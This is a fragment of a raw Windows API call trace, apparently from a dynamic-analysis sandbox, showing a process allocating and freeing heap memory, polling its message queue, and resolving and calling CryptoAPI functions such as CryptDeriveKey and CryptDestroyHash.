[0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0206.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0206.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0206.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0206.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50bd8 [0206.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50bd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.506] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87050) returned 1 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0206.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0206.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0206.508] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0206.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0206.508] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0206.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0206.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0206.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0206.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0206.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0206.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0206.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0206.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0206.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0206.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0206.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0206.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0206.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0206.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0206.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0206.511] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0206.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0206.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0206.511] CryptDestroyHash (hHash=0xa87490) returned 1 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0206.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0206.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0206.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0206.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0206.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0206.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0206.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0206.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0206.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0206.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0206.515] 